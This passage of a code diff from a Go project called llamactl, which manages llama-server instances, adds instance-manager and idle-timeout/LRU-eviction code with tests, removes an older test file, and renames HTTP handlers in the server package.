}
if inst.GetStatus() != instance.Stopped {
t.Error("New instance should not be running")
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
}
}
func TestCreateInstance_ValidationAndLimits(t *testing.T) {
// Test duplicate names
mngr := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := mngr.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("First CreateInstance failed: %v", err)
}
// Try to create duplicate
_, err = mngr.CreateInstance("test-instance", options)
if err == nil {
t.Error("Expected error for duplicate instance name")
}
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
// Test max instances limit
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 1, // Very low limit for testing
TimeoutCheckInterval: 5,
}
limitedManager := manager.NewInstanceManager(cfg)
_, err = limitedManager.CreateInstance("instance1", options)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
// This should fail due to max instances limit
_, err = limitedManager.CreateInstance("instance2", options)
if err == nil {
t.Error("Expected error when exceeding max instances limit")
}
if !strings.Contains(err.Error(), "maximum number of instances") {
t.Errorf("Expected max instances error, got: %v", err)
}
}
func TestPortManagement(t *testing.T) {
manager := createTestManager()
// Test auto port assignment
options1 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst1, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
port1 := inst1.GetPort()
if port1 < 8000 || port1 > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port1)
}
// Test port conflict detection
options2 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: port1, // Same port - should conflict
},
}
_, err = manager.CreateInstance("instance2", options2)
if err == nil {
t.Error("Expected error for port conflict")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
// Test port release on deletion
specificPort := 8080
options3 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: specificPort,
},
}
_, err = manager.CreateInstance("port-test", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
err = manager.DeleteInstance("port-test")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-port-test", options3)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestInstanceOperations(t *testing.T) {
manager := createTestManager()
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instance
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Get instance
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
// Update instance
newOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().LlamaServerOptions.Model)
}
// List instances
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 1 {
t.Errorf("Expected 1 instance, got %d", len(instances))
}
// Delete instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
// Test operations on non-existent instances
_, err = manager.GetInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
err = manager.DeleteInstance("nonexistent")
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
_, err = manager.UpdateInstance("nonexistent", options)
if err == nil || !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}

64
pkg/manager/timeout.go Normal file
View File

@@ -0,0 +1,64 @@
package manager
import (
"fmt"
"llamactl/pkg/instance"
"log"
)
func (im *instanceManager) checkAllTimeouts() {
im.mu.RLock()
var timeoutInstances []string
// Identify instances that should timeout
for _, inst := range im.instances {
if inst.ShouldTimeout() {
timeoutInstances = append(timeoutInstances, inst.Name)
}
}
im.mu.RUnlock() // Release read lock before calling StopInstance
// Stop the timed-out instances
for _, name := range timeoutInstances {
log.Printf("Instance %s has timed out, stopping it", name)
if _, err := im.StopInstance(name); err != nil {
log.Printf("Error stopping instance %s: %v", name, err)
} else {
log.Printf("Instance %s stopped successfully", name)
}
}
}
// EvictLRUInstance finds and stops the least recently used running instance.
func (im *instanceManager) EvictLRUInstance() error {
im.mu.RLock()
var lruInstance *instance.Process
for name, _ := range im.runningInstances {
inst := im.instances[name]
if inst == nil {
continue
}
if inst.GetOptions() != nil && inst.GetOptions().IdleTimeout != nil && *inst.GetOptions().IdleTimeout <= 0 {
continue // Skip instances without idle timeout
}
if lruInstance == nil {
lruInstance = inst
}
if inst.LastRequestTime() < lruInstance.LastRequestTime() {
lruInstance = inst
}
}
im.mu.RUnlock()
if lruInstance == nil {
return fmt.Errorf("failed to find lru instance")
}
// Evict Instance
_, err := im.StopInstance(lruInstance.Name)
return err
}

328
pkg/manager/timeout_test.go Normal file
View File

@@ -0,0 +1,328 @@
package manager_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"sync"
"testing"
"time"
)
func TestTimeoutFunctionality(t *testing.T) {
// Test timeout checker initialization
cfg := config.InstancesConfig{
PortRange: [2]int{8000, 9000},
TimeoutCheckInterval: 10,
MaxInstances: 5,
}
manager := manager.NewInstanceManager(cfg)
if manager == nil {
t.Fatal("Manager should be initialized with timeout checker")
}
manager.Shutdown() // Clean up
// Test timeout configuration and logic without starting the actual process
testManager := createTestManager()
defer testManager.Shutdown()
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst, err := testManager.CreateInstance("timeout-test", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Test timeout configuration is properly set
if inst.GetOptions().IdleTimeout == nil {
t.Fatal("Instance should have idle timeout configured")
}
if *inst.GetOptions().IdleTimeout != 1 {
t.Errorf("Expected idle timeout 1 minute, got %d", *inst.GetOptions().IdleTimeout)
}
// Test timeout logic without actually starting the process
// Create a mock time provider to simulate timeout
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set instance to running state so timeout logic can work
inst.SetStatus(instance.Running)
// Simulate instance being "running" for timeout check (without actual process)
// We'll test the ShouldTimeout logic directly
inst.UpdateLastRequestTime()
// Initially should not timeout (just updated)
if inst.ShouldTimeout() {
t.Error("Instance should not timeout immediately after request")
}
// Advance time to trigger timeout
mockTime.SetTime(time.Now().Add(2 * time.Minute))
// Now it should timeout
if !inst.ShouldTimeout() {
t.Error("Instance should timeout after idle period")
}
// Reset running state to avoid shutdown issues
inst.SetStatus(instance.Stopped)
// Test that instance without timeout doesn't timeout
noTimeoutOptions := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
// No IdleTimeout set
}
noTimeoutInst, err := testManager.CreateInstance("no-timeout-test", noTimeoutOptions)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
noTimeoutInst.SetTimeProvider(mockTime)
noTimeoutInst.SetStatus(instance.Running) // Set to running for timeout check
noTimeoutInst.UpdateLastRequestTime()
// Even with time advanced, should not timeout
if noTimeoutInst.ShouldTimeout() {
t.Error("Instance without timeout configuration should never timeout")
}
// Reset running state to avoid shutdown issues
noTimeoutInst.SetStatus(instance.Stopped)
}
func TestEvictLRUInstance_Success(t *testing.T) {
manager := createTestManager()
// Don't defer manager.Shutdown() - we'll handle cleanup manually
// Create 3 instances with idle timeout enabled (value doesn't matter for LRU logic)
options1 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model1.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
options2 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model2.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
options3 := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model3.gguf",
},
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
}
inst1, err := manager.CreateInstance("instance-1", options1)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
inst2, err := manager.CreateInstance("instance-2", options2)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
inst3, err := manager.CreateInstance("instance-3", options3)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Set up mock time and set instances to running
mockTime := NewMockTimeProvider(time.Now())
inst1.SetTimeProvider(mockTime)
inst2.SetTimeProvider(mockTime)
inst3.SetTimeProvider(mockTime)
inst1.SetStatus(instance.Running)
inst2.SetStatus(instance.Running)
inst3.SetStatus(instance.Running)
// Set different last request times (oldest to newest)
// inst1: oldest (will be evicted)
inst1.UpdateLastRequestTime()
mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
inst2.UpdateLastRequestTime()
mockTime.SetTime(mockTime.Now().Add(1 * time.Minute))
inst3.UpdateLastRequestTime()
// Evict LRU instance (should be inst1)
err = manager.EvictLRUInstance()
if err != nil {
t.Fatalf("EvictLRUInstance failed: %v", err)
}
// Verify inst1 is stopped
if inst1.IsRunning() {
t.Error("Expected instance-1 to be stopped after eviction")
}
// Verify inst2 and inst3 are still running
if !inst2.IsRunning() {
t.Error("Expected instance-2 to still be running")
}
if !inst3.IsRunning() {
t.Error("Expected instance-3 to still be running")
}
// Clean up manually - set all to stopped and then shutdown
inst2.SetStatus(instance.Stopped)
inst3.SetStatus(instance.Stopped)
}
func TestEvictLRUInstance_NoEligibleInstances(t *testing.T) {
// Helper function to create instances with different timeout configurations
createInstanceWithTimeout := func(manager manager.InstanceManager, name, model string, timeout *int) *instance.Process {
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: model,
},
IdleTimeout: timeout,
}
inst, err := manager.CreateInstance(name, options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
return inst
}
t.Run("no running instances", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
err := manager.EvictLRUInstance()
if err == nil {
t.Error("Expected error when no running instances exist")
}
if err.Error() != "failed to find lru instance" {
t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
}
})
t.Run("only instances without timeout", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
// Create instances with various non-eligible timeout configurations
zeroTimeout := 0
negativeTimeout := -1
inst1 := createInstanceWithTimeout(manager, "no-timeout-1", "/path/to/model1.gguf", &zeroTimeout)
inst2 := createInstanceWithTimeout(manager, "no-timeout-2", "/path/to/model2.gguf", &negativeTimeout)
inst3 := createInstanceWithTimeout(manager, "no-timeout-3", "/path/to/model3.gguf", nil)
// Set instances to running
instances := []*instance.Process{inst1, inst2, inst3}
for _, inst := range instances {
inst.SetStatus(instance.Running)
}
defer func() {
// Reset instances to stopped to avoid shutdown panics
for _, inst := range instances {
inst.SetStatus(instance.Stopped)
}
}()
// Try to evict - should fail because no eligible instances
err := manager.EvictLRUInstance()
if err == nil {
t.Error("Expected error when no eligible instances exist")
}
if err.Error() != "failed to find lru instance" {
t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
}
// Verify all instances are still running
for i, inst := range instances {
if !inst.IsRunning() {
t.Errorf("Expected instance %d to still be running", i+1)
}
}
})
t.Run("mixed instances - evicts only eligible ones", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
// Create mix of instances: some with timeout enabled, some disabled
validTimeout := 1
zeroTimeout := 0
instWithTimeout := createInstanceWithTimeout(manager, "with-timeout", "/path/to/model-with-timeout.gguf", &validTimeout)
instNoTimeout1 := createInstanceWithTimeout(manager, "no-timeout-1", "/path/to/model-no-timeout1.gguf", &zeroTimeout)
instNoTimeout2 := createInstanceWithTimeout(manager, "no-timeout-2", "/path/to/model-no-timeout2.gguf", nil)
// Set all instances to running
instances := []*instance.Process{instWithTimeout, instNoTimeout1, instNoTimeout2}
for _, inst := range instances {
inst.SetStatus(instance.Running)
inst.UpdateLastRequestTime()
}
defer func() {
// Reset instances to stopped to avoid shutdown panics
for _, inst := range instances {
if inst.IsRunning() {
inst.SetStatus(instance.Stopped)
}
}
}()
// Evict LRU instance - should only consider the one with timeout
err := manager.EvictLRUInstance()
if err != nil {
t.Fatalf("EvictLRUInstance failed: %v", err)
}
// Verify only the instance with timeout was evicted
if instWithTimeout.IsRunning() {
t.Error("Expected with-timeout instance to be stopped after eviction")
}
if !instNoTimeout1.IsRunning() {
t.Error("Expected no-timeout-1 instance to still be running")
}
if !instNoTimeout2.IsRunning() {
t.Error("Expected no-timeout-2 instance to still be running")
}
})
}
// Helper for timeout tests
type MockTimeProvider struct {
currentTime time.Time
mu sync.RWMutex
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
return &MockTimeProvider{currentTime: t}
}
func (m *MockTimeProvider) Now() time.Time {
m.mu.RLock()
defer m.mu.RUnlock()
return m.currentTime
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.mu.Lock()
defer m.mu.Unlock()
m.currentTime = t
}

View File

@@ -1,501 +0,0 @@
package llamactl_test
import (
"strings"
"testing"
llamactl "llamactl/pkg"
)
func TestNewInstanceManager(t *testing.T) {
config := llamactl.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogDirectory: "/tmp/test",
MaxInstances: 5,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
manager := llamactl.NewInstanceManager(config)
if manager == nil {
t.Fatal("NewInstanceManager returned nil")
}
// Test initial state
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 0 {
t.Errorf("Expected empty instance list, got %d instances", len(instances))
}
}
func TestCreateInstance_Success(t *testing.T) {
manager := createTestManager()
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if instance.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", instance.Name)
}
if instance.Running {
t.Error("New instance should not be running")
}
if instance.GetOptions().Port != 8080 {
t.Errorf("Expected port 8080, got %d", instance.GetOptions().Port)
}
}
func TestCreateInstance_DuplicateName(t *testing.T) {
manager := createTestManager()
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create first instance
_, err := manager.CreateInstance("test-instance", options1)
if err != nil {
t.Fatalf("First CreateInstance failed: %v", err)
}
// Try to create duplicate
_, err = manager.CreateInstance("test-instance", options2)
if err == nil {
t.Error("Expected error for duplicate instance name")
}
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
}
func TestCreateInstance_MaxInstancesLimit(t *testing.T) {
// Create manager with low max instances limit
config := llamactl.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 2, // Very low limit for testing
}
manager := llamactl.NewInstanceManager(config)
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options3 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instances up to the limit
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
_, err = manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
// This should fail due to max instances limit
_, err = manager.CreateInstance("instance3", options3)
if err == nil {
t.Error("Expected error when exceeding max instances limit")
}
if !strings.Contains(err.Error(), "maximum number of instances") && !strings.Contains(err.Error(), "limit") {
t.Errorf("Expected max instances error, got: %v", err)
}
}
func TestCreateInstance_PortAssignment(t *testing.T) {
manager := createTestManager()
// Create instance without specifying port
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Should auto-assign a port in the range
port := instance.GetOptions().Port
if port < 8000 || port > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port)
}
}
func TestCreateInstance_PortConflictDetection(t *testing.T) {
manager := createTestManager()
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080, // Explicit port
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: 8080, // Same port - should conflict
},
}
// Create first instance
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
// Try to create second instance with same port
_, err = manager.CreateInstance("instance2", options2)
if err == nil {
t.Error("Expected error for port conflict")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "conflict") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
}
func TestCreateInstance_MultiplePortAssignment(t *testing.T) {
manager := createTestManager()
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create multiple instances and verify they get different ports
instance1, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
instance2, err := manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
port1 := instance1.GetOptions().Port
port2 := instance2.GetOptions().Port
if port1 == port2 {
t.Errorf("Expected different ports, both got %d", port1)
}
}
func TestCreateInstance_PortExhaustion(t *testing.T) {
// Create manager with very small port range
config := llamactl.InstancesConfig{
PortRange: [2]int{8000, 8001}, // Only 2 ports available
MaxInstances: 10, // Higher than available ports
}
manager := llamactl.NewInstanceManager(config)
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options3 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instances to exhaust all ports
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
_, err = manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
// This should fail due to port exhaustion
_, err = manager.CreateInstance("instance3", options3)
if err == nil {
t.Error("Expected error when ports are exhausted")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "available") {
t.Errorf("Expected port exhaustion error, got: %v", err)
}
}
func TestDeleteInstance_PortRelease(t *testing.T) {
manager := createTestManager()
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
// Create instance with specific port
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Delete the instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-instance", options)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestGetInstance_Success(t *testing.T) {
manager := createTestManager()
// Create an instance first
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Retrieve it
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
}
func TestGetInstance_NotFound(t *testing.T) {
manager := createTestManager()
_, err := manager.GetInstance("nonexistent")
if err == nil {
t.Error("Expected error for nonexistent instance")
}
if !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestListInstances(t *testing.T) {
manager := createTestManager()
// Initially empty
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 0 {
t.Errorf("Expected 0 instances, got %d", len(instances))
}
// Create some instances
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err = manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
_, err = manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
// List should return both
instances, err = manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 2 {
t.Errorf("Expected 2 instances, got %d", len(instances))
}
// Check names are present
names := make(map[string]bool)
for _, instance := range instances {
names[instance.Name] = true
}
if !names["instance1"] || !names["instance2"] {
t.Error("Expected both instance1 and instance2 in list")
}
}
func TestDeleteInstance_Success(t *testing.T) {
manager := createTestManager()
// Create an instance
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Delete it
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should no longer exist
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
}
func TestDeleteInstance_NotFound(t *testing.T) {
manager := createTestManager()
err := manager.DeleteInstance("nonexistent")
if err == nil {
t.Error("Expected error for deleting nonexistent instance")
}
if !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestUpdateInstance_Success(t *testing.T) {
manager := createTestManager()
// Create an instance
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Update it
newOptions := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().Model)
}
if updated.GetOptions().Port != 8081 {
t.Errorf("Expected port 8081, got %d", updated.GetOptions().Port)
}
}
func TestUpdateInstance_NotFound(t *testing.T) {
manager := createTestManager()
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := manager.UpdateInstance("nonexistent", options)
if err == nil {
t.Error("Expected error for updating nonexistent instance")
}
if !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
// Helper function to create a test manager with standard config
func createTestManager() llamactl.InstanceManager {
config := llamactl.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogDirectory: "/tmp/test",
MaxInstances: 10,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
return llamactl.NewInstanceManager(config)
}

View File

@@ -1,10 +1,13 @@
package llamactl package server
import ( import (
"bytes" "bytes"
"encoding/json" "encoding/json"
"fmt" "fmt"
"io" "io"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"net/http" "net/http"
"os/exec" "os/exec"
"strconv" "strconv"
@@ -14,26 +17,43 @@ import (
) )
type Handler struct { type Handler struct {
InstanceManager InstanceManager InstanceManager manager.InstanceManager
config Config cfg config.AppConfig
} }
func NewHandler(im InstanceManager, config Config) *Handler { func NewHandler(im manager.InstanceManager, cfg config.AppConfig) *Handler {
return &Handler{ return &Handler{
InstanceManager: im, InstanceManager: im,
config: config, cfg: cfg,
} }
} }
// HelpHandler godoc // VersionHandler godoc
// @Summary Get llamactl version
// @Description Returns the version of the llamactl command
// @Tags version
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "Version information"
// @Failure 500 {string} string "Internal Server Error"
// @Router /version [get]
func (h *Handler) VersionHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", "text/plain")
fmt.Fprintf(w, "Version: %s\nCommit: %s\nBuild Time: %s\n", h.cfg.Version, h.cfg.CommitHash, h.cfg.BuildTime)
}
}
// LlamaServerHelpHandler godoc
// @Summary Get help for llama server // @Summary Get help for llama server
// @Description Returns the help text for the llama server command // @Description Returns the help text for the llama server command
// @Tags server // @Tags server
// @Security ApiKeyAuth
// @Produces text/plain // @Produces text/plain
// @Success 200 {string} string "Help text" // @Success 200 {string} string "Help text"
// @Failure 500 {string} string "Internal Server Error" // @Failure 500 {string} string "Internal Server Error"
// @Router /server/help [get] // @Router /server/help [get]
func (h *Handler) HelpHandler() http.HandlerFunc { func (h *Handler) LlamaServerHelpHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) { return func(w http.ResponseWriter, r *http.Request) {
helpCmd := exec.Command("llama-server", "--help") helpCmd := exec.Command("llama-server", "--help")
output, err := helpCmd.CombinedOutput() output, err := helpCmd.CombinedOutput()
@@ -46,15 +66,16 @@ func (h *Handler) HelpHandler() http.HandlerFunc {
} }
} }
// VersionHandler godoc // LlamaServerVersionHandler godoc
// @Summary Get version of llama server // @Summary Get version of llama server
// @Description Returns the version of the llama server command // @Description Returns the version of the llama server command
// @Tags server // @Tags server
// @Security ApiKeyAuth
// @Produces text/plain // @Produces text/plain
// @Success 200 {string} string "Version information" // @Success 200 {string} string "Version information"
// @Failure 500 {string} string "Internal Server Error" // @Failure 500 {string} string "Internal Server Error"
// @Router /server/version [get] // @Router /server/version [get]
func (h *Handler) VersionHandler() http.HandlerFunc { func (h *Handler) LlamaServerVersionHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) { return func(w http.ResponseWriter, r *http.Request) {
versionCmd := exec.Command("llama-server", "--version") versionCmd := exec.Command("llama-server", "--version")
output, err := versionCmd.CombinedOutput() output, err := versionCmd.CombinedOutput()
@@ -67,15 +88,16 @@ func (h *Handler) VersionHandler() http.HandlerFunc {
} }
} }
// ListDevicesHandler godoc // LlamaServerListDevicesHandler godoc
// @Summary List available devices for llama server // @Summary List available devices for llama server
// @Description Returns a list of available devices for the llama server // @Description Returns a list of available devices for the llama server
// @Tags server // @Tags server
// @Security ApiKeyAuth
// @Produces text/plain // @Produces text/plain
// @Success 200 {string} string "List of devices" // @Success 200 {string} string "List of devices"
// @Failure 500 {string} string "Internal Server Error" // @Failure 500 {string} string "Internal Server Error"
// @Router /server/devices [get] // @Router /server/devices [get]
